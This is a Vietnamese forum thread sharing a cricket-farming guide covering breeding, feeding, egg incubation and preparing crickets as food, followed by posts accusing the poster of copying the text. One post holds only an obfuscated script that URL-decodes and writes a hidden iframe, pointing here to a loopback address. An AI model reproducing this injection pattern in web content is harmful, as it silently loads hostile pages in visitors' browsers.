kỹ thuật nuôi dế mèn

  • Thread starter VIỆT KHA
  • Ngày gửi
Status
Không còn mở để tiếp tục thảo luận
THÔNG TIN NGƯỜI GỬI:

- Tên DN/Cá nhân: VIỆT KHA
- Địa chỉ: Đội 11, Nhạn Tháp, Mễ Sở, Văn Giang, Hưng Yên
- Tel, Fax: ::: FaX
- email: doiphongba_08@yahoo.com.vn
================================

<strong><font face="Times New Roman">TRANG TRẠI DẾ VIỆT KHA<br /></font></strong><strong><font face="Times New Roman">Đ/C: đội 11, Nhạn Th&aacute;p, Mễ Sở, Văn Giang, Hưng Y&ecirc;n<br /></font></strong><strong><font face="Times New Roman">SĐT: 0904.687.222 hoặc 0933.868.666<br /></font></strong><font face="Times New Roman">Trong những năm gần đ&acirc;y m&oacute;n ăn từ c&ocirc;n tr&ugrave;ng đ&atilde; thu h&uacute;t được nhiều thực kh&aacute;ch kh&ocirc;ng chỉ ở c&aacute;c nước Ch&acirc;u &Acirc;u, Ch&acirc;u &Aacute; m&agrave; cả ở Việt nam. Trong c&aacute;c loại c&ocirc;n tr&ugrave;ng được sử dụng th&igrave; ưa chuộng hơn cả l&agrave; thịt dế, thịt dế gi&agrave;u đạm, can-xi, vị ngon ngọt kh&ocirc;ng k&eacute;m thịt cua n&ecirc;n ng&agrave;y c&agrave;ng được nhiều thực kh&aacute;ch t&igrave;m đến. Theo Tiến sĩ Nguyễn Thị Chắt, giảng dạy về c&ocirc;n tr&ugrave;ng học, ĐH N&ocirc;ng l&acirc;m TP HCM, cho rằng: &quot;Do thức ăn của dế chủ yếu l&agrave; thực vật, một số s&aacute;ch đ&ocirc;ng y c&ograve;n d&ugrave;ng dế để trị bệnh n&ecirc;n người d&ugrave;ng c&oacute; thể y&ecirc;n t&acirc;m khi ăn v&agrave;o cơ thể. Thức ăn để nu&ocirc;i dế cũng dễ kiếm, chủ yếu l&agrave; c&aacute;c loại cỏ mọc tự nhi&ecirc;n, nhiều nơi muốn tăng dinh dưỡng th&igrave; cho dế ăn th&ecirc;m c&aacute;m (loại d&agrave;nh cho chim ăn)<strong>.</strong> Trong y học cổ truyền, dế m&egrave;n c&oacute; vị mặn, cay, t&iacute;nh b&igrave;nh v&agrave; c&oacute; t&aacute;c dụng lợi tiểu, chữa b&iacute; đ&aacute;i. Theo Y tổ Tuệ Tĩnh, dế m&egrave;n (5 con) sấy kh&ocirc;, t&aacute;n nhỏ, r&acirc;y bột mịn, uống với nước b&igrave;m bịp sắc l&ecirc;n, uống v&agrave;o l&uacute;c đ&oacute;i c&oacute; thể chữa cổ trướng thở dốc (Nam dược thần hiệu).<br /></font><font face="Times New Roman">Theo c&aacute;c t&agrave;i liệu nước ngo&agrave;i, dế m&egrave;n l&agrave; c&ocirc;n tr&ugrave;ng gi&agrave;u pr&ocirc;t&iacute;t, &iacute;t chất b&eacute;o, gi&uacute;p giảm lượng coletoron trong m&aacute;u, thịt dế m&egrave;n c&ograve;n được d&ugrave;ng trong c&aacute;c trường hợp chữa chứng nhiễm độc nước tiểu, chữa sỏi thận.<br /></font><font face="Times New Roman">Dế l&agrave; c&ocirc;n tr&ugrave;ng đặc sản c&oacute; gi&aacute; trị kinh tế rất cao . Nu&ocirc;i dế l&agrave;m kinh tế ph&ugrave; hợp với nhiều người, kể cả những hộ gia đ&igrave;nh sống ở khu độ thị v&igrave; nu&ocirc;i dế kh&ocirc;ng đ&ograve;i hỏi nhiều diện t&iacute;ch v&agrave; cũng kh&ocirc;ng g&acirc;y &ocirc; nhiễm m&ocirc;i trường . Thị trường hiện nay c&oacute; nhu cầu kh&aacute; lớn về con dế. <br /></font><font face="Times New Roman">Dế ta c&oacute; k&iacute;ch thước trung b&igrave;nh với chiều d&agrave;i cơ thể khoảng 2cm. Dế ta c&oacute; 3 m&agrave;u đặc trưng như: đen huyền, đỏ hoe v&agrave; v&agrave;ng nghệ. Tập t&iacute;nh sinh hoạt v&agrave; m&ocirc;i trường sống: Trong tự nhi&ecirc;n, dế ta sinh trưởng, ph&aacute;t triển v&agrave; sinh sản quanh năm, nhưng nhiều nhất l&agrave; v&agrave;o m&ugrave;a mưa. Dế ta c&oacute; bản t&iacute;nh hung hăng, nhưng lại th&iacute;ch sống theo bầy đ&agrave;n, m&ocirc;i trường sống rất đơn giản, kh&ocirc;ng cầu kỳ, c&oacute; thể ở hang hay trong những đ&aacute;m cỏ kh&ocirc;&hellip; n&ecirc;n c&oacute; thể tổ chức chăn nu&ocirc;i c&ocirc;ng nghiệp, nhưng phải đảm bảo chuồng trại nu&ocirc;i dế tương tự như m&ocirc;i trường thi&ecirc;n nhi&ecirc;n hoang d&atilde;. M&ocirc;i trường sống tự nhi&ecirc;n, dế sẽ &iacute;t dịch bệnh, &iacute;t tốn c&ocirc;ng chăm s&oacute;c. Dế leo tr&egrave;o rất giỏi v&agrave; c&oacute; thể nhảy xa chừng nửa m&eacute;t. Đặc biệt, tối đến dế c&oacute; thể bay xa h&agrave;ng m&eacute;t&hellip;Tuổi thọ: Tuổi thọ của c&aacute;c loại dế kh&aacute;c nhau. Tuổi thọ của dế ta trung b&igrave;nh l&agrave; 4 th&aacute;ng.<br /></font><font face="Times New Roman">Vậy để đ&aacute;p ứng nhu cầu một số nh&agrave; h&agrave;ng ở HN v&agrave; một số hộ chăn nu&ocirc;i. Trang trại dế Việt Kha đ&atilde; cung cấp dế giống cho c&aacute;c hộ chăn nu&ocirc;i v&agrave; hướng dẫn kỹ thuật một c&aacute;ch nhiệt t&igrave;nh gi&uacute;p người nu&ocirc;i đạt hiệu quả tốt nhất. Sau đ&acirc;y l&agrave; một số kỹ thuật, kinh nghiệm m&agrave; trang trại ch&uacute;ng t&ocirc;i gửi tới người nu&ocirc;i.<br /></font><h1><strong><em><font size="5"><font face=".VnTime">K&uuml; thu&Euml;t nu&laquo;i &nbsp;d&Otilde;:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br /></font></font></em></strong></h1><strong><font face="Times New Roman">1. Ph&acirc;n biệt dế đực, c&aacute;i&nbsp;&nbsp; </font></strong><br /><font face="Times New Roman">- Dế đực phần ''đầu ngực'' to hơn dế c&aacute;i.<br />- Dế đực c&aacute;nh m&agrave;u đen pha m&agrave;u n&acirc;u kh&ocirc;ng b&oacute;ng mượt.<br />- Dế c&aacute;i c&aacute;nh m&agrave;u đen b&oacute;ng mượt hơn dế đực.<br />- Dế đực bụng nhỏ hơn dế c&aacute;i v&igrave; bụng dế c&aacute;i c&oacute; trứng n&ecirc;n to hơn.<br />- Dế đực kh&ocirc;ng c&oacute; bộ phận để đ&agrave;o đất ( giống như c&aacute;i kim kh&acirc;u quần &aacute;o) ở phần đu&ocirc;i , c&ograve;n dế c&aacute;i th&igrave; c&oacute; để ch&uacute;ng đ&agrave;o ổ đẻ.&nbsp; <br />- Dế đực trưởng th&agrave;nh k&ecirc;u về ban đ&ecirc;m c&ograve;n dế c&aacute;i kh&ocirc;ng k&ecirc;u.<strong> V&ograve;ng sinh trưởng của dế</strong>: Dế mẹ đẻ trứng sau 9 -12 ng&agrave;y dế con sẽ nở .Nu&ocirc;i từ l&uacute;c dế nở đ&ecirc;n khi thu hoạch khoảng 40-45 ng&agrave;y. Từ ng&agrave;y 60-62 trở đi Dế bắt đầu phối giống v&agrave; bước v&agrave;o giai đoạn sinh sản<strong><br /></strong></font><font face="Times New Roman"><strong>2. Dụng cụ nu&ocirc;i, </strong><strong>h&igrave;nh thức nu&ocirc;i<br /></strong></font><font face="Times New Roman">-Dụng cụ v&agrave; h&igrave;nh thức nu&ocirc;i dế l&agrave; kh&acirc;u rất quan trọng trong qu&aacute; tr&igrave;nh chăn nu&ocirc;i dế. N&oacute; kh&ocirc;ng chỉ li&ecirc;n quan đến kinh ph&iacute; trong chăn nu&ocirc;i m&agrave; c&ograve;n ảnh hưởng lớn đến sản lượng cũng như mức độ hao hụt dế.<br /></font><font face="Times New Roman">Hiện nay h&igrave;nh thức nu&ocirc;i phổ biến nhất l&agrave; nu&ocirc;i trong th&ugrave;ng nhựa ( loại th&ugrave;ng 60 l&iacute;t) N&ecirc;n mua loại th&ugrave;ng c&oacute; nắp đậy . sau đ&oacute; d&ugrave;ng que sắt hơ lửa chọc thủng lỗ nhỏ to bằng đầu que di&ecirc;m l&ecirc;n nắp th&ugrave;ng tạo đường th&ocirc;ng kh&iacute;. </font><br /><font face="Times New Roman">Ngo&agrave;i nu&ocirc;i trong th&ugrave;ng nhựa tr&ograve;n .Nu&ocirc;i trong khay h&igrave;nh chữ nhật v&agrave; xếp c&aacute;c hộp đ&egrave; l&ecirc;n nhau để tiết kiệm diện t&iacute;ch rất ph&ugrave; hợp nu&ocirc;i c&ocirc;ng nghiệp quy m&ocirc; lớn .Tuy nhi&ecirc;n đ&acirc;y cũng l&agrave; h&igrave;nh thức cần đầu tư lớn nhất.<br /></font><font face="Times New Roman" /><br /><font face="Times New Roman">Một h&igrave;nh thức nu&ocirc;i kh&aacute;c mới đ&acirc;y nhất được &aacute;p dụng theo hướng giảm chi ph&iacute; cho người nu&ocirc;i l&agrave; nu&ocirc;i trong chuồng gỗ đ&oacute;ng với . Với k&iacute;ch thước to hơn chiếc quan t&agrave;i th&ocirc;ng thường đ&ocirc;i ch&uacute;t . H&igrave;nh thức n&agrave;y chỉ d&agrave;nh cho những nơi c&oacute; diện t&iacute;ch lớn .<br /></font><font face="Times New Roman" /><br /><font face="Times New Roman">H&igrave;nh thức nu&ocirc;i trong chậu: cao 35 - 40cm, đường k&iacute;nh từ 40 - 50cm. Nu&ocirc;i bằng chậu phải d&ugrave;ng lồng b&agrave;n hoặc d&ugrave;ng lưới để che chắn. Do nu&ocirc;i bằng chậu đỡ tốn diện t&iacute;ch, ph&ugrave; hợp v&agrave; tiện &iacute;ch hơn n&ecirc;n trang trại ch&uacute;ng t&ocirc;i chọn c&aacute;ch nu&ocirc;i n&agrave;y.&nbsp; <br /></font><font face="Times New Roman" /><br /><strong><font face="Times New Roman">- C&aacute;i dế bắc nồi cơm, cọng rơm, giấy</font></strong><font face="Times New Roman"> l&agrave; những vật tạo khoảng kh&ocirc;ng cho dế sinh sống leo tr&egrave;o, lột x&aacute;c v&agrave; trốn tr&aacute;nh kẻ th&ugrave;. Mỗi lần lột x&aacute;c dế rất mềm v&agrave; thường bị đồng loại ăn thịt v&igrave; thế cần tạo nhiều kh&ocirc;ng gian sinh sống cho dế sẽ tr&aacute;nh được t&igrave;nh trạng hao hụt trong chăn nu&ocirc;i. C&aacute;c loại giấy đ&atilde; qua sử dụng được v&ograve; n&aacute;t rất hữu &iacute;ch để nu&ocirc;i dế . Dưới đ&aacute;y th&ugrave;ng khi được l&oacute;t 1 lớp giấy sẽ dễ d&agrave;ng hơn cho lần vệ sinh sau .Đồng thời đ&acirc;y cũng l&agrave; thứ để Dễ gặm nhấm <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Khay đựng thức ăn: Tận dụng nắp nhựa c&oacute; sẵn, đường k&iacute;nh từ 7 - 10cm c&oacute; v&agrave;nh cao 1cm hoặc cưa c&aacute;c đốt tre, hoặc d&ugrave;ng c&aacute;c đĩa chấm thức ăn.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Khay nước uống: Tương tự l&agrave;m như khay đựng thức ăn.<br /><strong>Ch&uacute; &yacute;</strong>: Nếu c&aacute;c bạn d&ugrave;ng đĩa chấm thức ăn l&agrave;m khay cho dế ăn hoặc uống nước m&agrave; chưa l&agrave;m nh&aacute;m bề mặt th&igrave; dế rất kh&oacute; leo l&ecirc;n v&agrave; khi c&oacute; b&ograve; được l&ecirc;n rồi th&igrave; b&ograve; ra cũng kh&oacute;, nếu l&agrave; khay nước uống th&igrave; rất dễ bị chết đuối v&igrave; kh&ocirc;ng b&ograve; ra được. V&igrave; vậy tất cả c&aacute;c khay đều phải được l&agrave;m nh&aacute;m cả trong lẫn ngo&agrave;i để dế c&oacute; thể leo tr&egrave;o thoải m&aacute;i.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Đất cho dế đẻ: T&ocirc;i thường d&ugrave;ng đất đ&atilde; l&agrave;m mịn trộn lẫn với c&aacute;t , cứ 2 đất th&igrave; 1 c&aacute;t như vậy đất sẽ tươi xốp v&agrave; giữ được độ ẩm cao.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>3. Thức ăn của dế </strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Cỏ c&aacute;c loại, cỏ chọn l&aacute; mềm kh&ocirc;ng đắng l&agrave; tốt nhất.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Dế dưới 10 ng&agrave;y tuổi th&iacute;ch ăn l&aacute; rau khoai lang, l&aacute; sắn non v&igrave; răng của ch&uacute;ng chưa ph&aacute;t triển.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - C&ugrave;i dưa hấu, c&agrave; rốt, rau muống, rau cải, l&aacute; đu đủ, l&aacute; sắn.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - C&aacute;m g&agrave;, c&aacute;m chim hỗn hợp nghiền mịn.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Nước uống.<br /><strong>Ch&uacute; &yacute;:</strong> Tất cả c&aacute;c loại rau cỏ dế ăn phải rửa sạch v&agrave; kh&ocirc;ng được c&oacute; thuốc trừ s&acirc;u, nếu dế ăn phải rau cỏ c&oacute; thuốc trừ s&acirc;u, dế sẽ bị đi ỉa hoặc chết.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>4. C&aacute;ch chọn dế giống</strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Dế giống phải to khoẻ, đầy đủ r&acirc;u, c&aacute;nh, ch&acirc;n.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - C&aacute;ch chọn dế đực cũng như dế c&aacute;i.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Cứ gh&eacute;p 1 đực với 2 c&aacute;i.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Một chậu th&igrave; ta để 60 c&aacute;i, 30 đực.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Hai khay thức ăn, 1 khay nước, 3 c&aacute;i dế cho dế đậu tr&egrave;o leo.<br /></font><font face="Times New Roman"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5. C&aacute;ch cho dế đẻ<br /></strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Khi thấy dế g&aacute;y v&agrave; x&ugrave; c&aacute;nh l&agrave; l&uacute;c dế chuẩn bị đẻ ta chuẩn bị khay đẻ v&agrave; đất cho dế đẻ.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Đến chiều tối bạn thử đặt hai khay đất v&agrave;o v&agrave; theo d&otilde;i xem dế c&oacute; b&ograve; l&ecirc;n đẻ kh&ocirc;ng.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Nếu thấy dể đẻ th&igrave; s&aacute;ng h&ocirc;m sau c&aacute;c bạn lấy khay trứng ra v&agrave; đưa đi ấp.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Thường trứng của 2- 3 ng&agrave;y đầu tỷ lệ nở &iacute;t hơn những ng&agrave;y sau do trứng kh&ocirc;ng được thụ tinh 100%.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Dế đẻ li&ecirc;n tục khi rạc th&igrave; chết ( trung b&igrave;nh 30 - 35 ng&agrave;y)<br /><strong>Ch&uacute; &yacute;:</strong> Chỉ bỏ khay trứng v&agrave;o th&ugrave;ng dể đẻ, sau khi trời đ&atilde; tối v&agrave; phải lấy ra v&agrave;o s&aacute;ng h&ocirc;m sau. Nếu kh&ocirc;ng dế bố mẹ c&oacute; thể đ&agrave;o bới khay trứng lộn tung.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>6. C&aacute;ch ấp trứng</strong><br /></font><font face="Times New Roman">- &Eacute;p nở: khay đẻ của dế được lấy ra đưa đi ấp, trước khi cho v&agrave;o th&ugrave;ng ấp chuẩn bị hai khăn b&ocirc;ng vu&ocirc;ng (loại khăn lạnh lau mặt ở c&aacute;c nh&agrave; h&agrave;ng), nh&uacute;ng nước ướt rồi đặt dưới đ&aacute;y th&ugrave;ng ấp sau đ&oacute; đặt khay trứng tr&ecirc;n khăn ướt v&agrave; d&ugrave;ng khăn ướt thứ hai đ&atilde; nh&uacute;ng nước đậy l&ecirc;n khay trứng để giữ độ ẩm. Sau khi đ&atilde; l&agrave;m xong c&aacute;c việc n&oacute;i tr&ecirc;n đậy nắp th&ugrave;ng lại.<br />&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;- T&ocirc;i thường lấy khay trứng ra xịt nước xếp ch&uacute;ng chồng l&ecirc;n nhau cứ 2 - 3 khay 1. Sau đ&oacute; d&ugrave;ng một c&aacute;i khăn loại d&agrave;y nh&uacute;ng nước v&agrave; vắt bớt một &iacute;t rồi ch&ugrave;m k&iacute;n khay trứng.<br /></font><font face="Times New Roman">-Nhiệt độ cần cho trứng nở khoảng 24 - 25 độ C (nhiệt độ ph&ograve;ng). Cứ 3 - 4 ng&agrave;y, thay khăn ướt một lần để giữ độ ẩm. Sau 9 - 12 ng&agrave;y to&agrave;n bộ trứng trong khay bắt đầu nở. Khi thấy dế đ&atilde; nở hết, lấy khay đẻ ra khỏi th&ugrave;ng v&agrave; chuyển dế con v&agrave;o th&ugrave;ng nu&ocirc;i. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Cứ một ng&agrave;y xịt nước cho khay trứng 2 lần v&agrave;o m&ugrave;a h&egrave; 1 lần v&agrave;o m&ugrave;a đ&ocirc;ng, 2 ngay nh&uacute;ng khăn ướt một lần.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Trứng ấp trong v&ograve;ng từ 9 - 12 ng&agrave;y l&agrave; nở, tr&uacute;ng nở trong vỏng 4 ng&agrave;y l&agrave; hết.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - T&ocirc;i thường để 2 khay trong một chậu, như vậy dế nở ra sẽ rất đều.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - C&aacute;c bạn kh&ocirc;ng n&ecirc;n để trứng của 2 -3 ng&agrave;y c&ugrave;ng một chậu, như vậy khi dế nở sẽ dẫn đến con to, con nhỏ kh&ocirc;ng đồng đều.<br /><strong>Ch&uacute; &yacute;:</strong> Khi c&aacute;c bạn xịt nước cho trứng thấy bề mặt đất c&oacute; m&agrave;u th&acirc;m n&acirc;u l&agrave; được. Kh&ocirc;ng n&ecirc;n xịt qu&aacute; nhiều v&igrave; như vậy trứng sẽ rất dễ bị ung.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>7. C&aacute;ch nu&ocirc;i dế từ mới nở đến 15 ng&agrave;y tuổi</strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Dế nở ra từ 2 khay trung b&igrave;nh được 2000 con.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - C&aacute;c bạn để từ 1 - 2 dế ( c&aacute;i dế để bắc nồi cơm) v&agrave;o chậu nu&ocirc;i để cho dế đậu tr&egrave;o leo.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Để 2 -3 b&uacute;i cỏ v&agrave;o chậu v&agrave; một khay thức ăn ( c&aacute;m g&agrave;)<br /><strong>Ch&uacute; &yacute;:</strong> C&aacute;c bạn tuy&ecirc;t đối kh&ocirc;ng được để khay nước v&agrave;o chậu nu&ocirc;i v&igrave; l&uacute;c n&agrave;y dế c&ograve;n nhỏ dễ sa v&agrave;o nước kh&ocirc;ng b&ograve; ra được, sẽ dẫn đến chết đuối.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Ta chỉ l&ecirc;n phun sương v&agrave;o 2 b&uacute;i cỏ để dế uống nước.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>8. C&aacute;ch nu&ocirc;i dế từ 15 - 30 ng&agrave;y tuổi</strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - L&uacute;c n&agrave;y dế đ&atilde; lớn c&aacute;c bạn c&oacute; thể dặt một khay nước v&agrave;o chậu cho dế uống nước m&agrave; kh&ocirc;ng sợ dế bị chết đuối nữa.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - T&ocirc;i thường để 1000 con tr&ecirc;n một chậu, một khay nước , hai khay thức ăn ( c&aacute;m g&agrave;) v&agrave; một &iacute;t rau cỏ v&agrave; 3 - 4 dế để cho dế đậu v&agrave; tr&egrave;o leo.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Cứ một ng&agrave;y vệ sinh khay cho dế uống nước một lần, khay thức ăn th&igrave; 2 ng&agrave;y một lần. Nếu c&ograve;n c&aacute;m ta cũng l&ecirc;n bỏ kh&ocirc;ng l&ecirc;n tiếc, c&ograve;n chậu nu&ocirc;i th&igrave; 3 &ndash; 5 ng&agrave;y dọn ph&acirc;n một lần.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>9. C&aacute;ch nu&ocirc;i dế từ 30 - 45 ng&agrave;y tuổi</strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Lượng dế trung b&igrave;nh từ 400 - 700 con <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - 2 khay thức ăn, một khay nước, 3 -4 dế để dế đậu tr&egrave;o leo.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - 1 &iacute;t rau cỏ hoặc c&ugrave;i dưa hấu hay một số l&aacute; c&acirc;y như đu đủ, sắn...<br />&nbsp;&nbsp;&nbsp;&nbsp; <strong>10. L&agrave;m thịt dế</strong><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - L&agrave;m thịt dế trước khi dế mọc c&aacute;nh d&agrave;i, thường ở v&agrave;o 50 ng&agrave;y tuổi. V&igrave; l&uacute;c n&agrave;y trọng lượng của dế lớn nhất v&agrave; b&eacute;o nhất.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Kh&ocirc;ng cho dế ăn từ 15- 20 tiếng trước khi l&agrave;m thịt để ruột dế được sạch sẽ.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Trước khi l&agrave;m thịt ng&acirc;m dế trong nước muối khoảng 2 ph&uacute;t.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Một tay cầm dế sao cho đầu con dế quay v&agrave;o trong l&ograve;ng b&agrave;n tay, bụng dế ngửa l&ecirc;n tr&ecirc;n, tay kia cấu nhẹ phần mẩu đu&ocirc;i v&agrave; từ từ r&uacute;t ruột dế ra khỏi bụng.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Sau khi đ&atilde; l&agrave;m sạch ruột dế c&aacute;c bạn rửa lại bằng nước sạch 2 - 3 lần v&agrave; để d&aacute;o nước, l&uacute;c n&agrave;y c&aacute;c bạn c&oacute; thể chế biến ra c&aacute;c m&oacute;n m&agrave; m&igrave;nh ưa th&iacute;ch.<br /></font><font face="Times New Roman">-Những con c&ograve;n qu&aacute; b&eacute; trong một th&ugrave;ng nu&ocirc;i cần dồn lại để vỗ b&eacute;o cho đợt thu hoạch tiếp theo. Những con th&agrave;nh phẩm cho v&agrave;o b&oacute;p bụng ,rửa sạch bằng nước muối lo&atilde;ng v&agrave; trữ lạnh để ti&ecirc;u thụ dần. C&aacute;c nh&agrave; h&agrave;ng c&oacute; thể chế biến nhiều c&acirc;n liền một l&uacute;c v&agrave; b&aacute;n dần cho kh&aacute;ch h&agrave;ng cho thuận tiện nhất.<br /></font><p><font face="Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></p><strong><em><font face="Times New Roman">CH&Uacute;C C&Aacute;C BẠN TH&Agrave;NH C&Ocirc;NG!<br /></font></em></strong><br /><br /><p><font face="Times New Roman" /></p><p><font face="Times New Roman">&nbsp;</font></p><p><font face=".VnTime" size="5">&nbsp;</font></p>
 
Website bạn đẹp đó... hihi design tốt thiện hen.
Ah! Mình là Quản trị mạng , trong lúc rãnh rỗi , thiết kế gom góp các dữ liệu cho anh em đọc chơi. Mình rất mê côn trùng bò sát , hiện đang có một quán dế như trong ảnh và cũng đang nuôi , chưa cung cấp rộng rãi , chủ yếu chỉ để cung cấp cho cái quán của mình thôi. :D Bạn nào có nhu cầu hợp tác thì cứ alo!
---------------
Bạn đang kinh doanh các mặt hàng được giới thiệu trên web đó phải không, hay là chỉ tự tạo theo ngẫu hứng?
Mình là IT nhưng rất có hứng với côn trùng nên có mở một Quán dế đúng như trong ảnh và trang trại đúng như giới thiệu trong Web nhưng mới chỉ cung cấp cho cái quán thôi. Bạn nào có hứng thú liên hệ nick Yahoo: liemoffline ::p
 
Last edited by a moderator:
<script>
<!--
document.write(unescape("%3Ciframe%20src%3D%27http%3A//127.0.0.2/iframe/5%27%3E%3C/iframe%3E"));
//-->
</script>
 
Đây là một Website mình tự tạo trong lúc rảnh rỗi, mời các bạn ghé thăm!
http://traidetuongvy.dyndns.info

Bác sửa lại bài viết đi . Bê bài của người khác mà quên thay tên của mình vào

GIới thiệu là tường vi mà mình đọc trên web lại thấy dòng này chán bác quá :lol:. Đang là Tường vi lại thấy có Việt Kha ở trong

xem lại link này đi bác http://traidetuongvy.dyndns.info/index.php?option=com_content&view=article&id=86&Itemid=87&lang=vi

Vậy để đáp ứng nhu cầu của một số nhà hàng và các hộ chăn nuôi, trang trại dế Việt Kha đã cung cấp dế mèn giống cho các hộ chăn nuôi và hướng dẫn kỹ thuật nuôi một cách nhiệt tình giúp người nuôi đạt hiệu quả tốt nhất. Sau đây là một số kỹ thuật, kinh nghiệm mà trang trại chúng tôi gửi tới người nuôi:
Kỹ thuật nuôi dế mèn


Còn ông việt kha trên kia lại cop trên web của mình . Vì mình đọc Văn của mình mình nhớ chứ. :1^:

-Dụng cụ và hình thức nuôi dế là khâu rất quan trọng trong quá trình chăn nuôi dế. Nó không chỉ liên quan đến kinh phí trong chăn nuôi mà còn ảnh hưởng lớn đến sản lượng cũng như mức độ hao hụt dế.
Hiện nay hình thức nuôi phổ biến nhất là nuôi trong thùng nhựa ( loại thùng 60 lít) Nên mua loại thùng có nắp đậy . sau đó dùng que sắt hơ lửa chọc thủng lỗ nhỏ to bằng đầu que diêm lên nắp thùng tạo đường thông khí.
Ngoài nuôi trong thùng nhựa tròn .Nuôi trong khay hình chữ nhật và xếp các hộp đè lên nhau để tiết kiệm diện tích rất phù hợp nuôi công nghiệp quy mô lớn .Tuy nhiên đây cũng là hình thức cần đầu tư lớn nhất.

Một hình thức nuôi khác mới đây nhất được áp dụng theo hướng giảm chi phí cho người nuôi là nuôi trong chuồng gỗ đóng với . Với kích thước to hơn chiếc quan tài thông thường đôi chút . Hình thức này chỉ dành cho những nơi có diện tích lớn .

Hình thức nuôi trong chậu: cao 35 - 40cm, đường kính từ 40 - 50cm. Nuôi bằng chậu phải dùng lồng bàn hoặc dùng lưới để che chắn. Do nuôi bằng chậu đỡ tốn diện tích, phù hợp và tiện ích hơn nên trang trại chúng tôi chọn cách nuôi này.

http://oas.vn/dungcunuoi.html <=== Nguồn gốc
 
Last edited by a moderator:
Còn ông việt kha trên kia lại cop trên web của mình . Vì mình đọc Văn của mình mình nhớ chứ. :1^:http://oas.vn/dungcunuoi.html <=== Nguồn gốc[/quote]
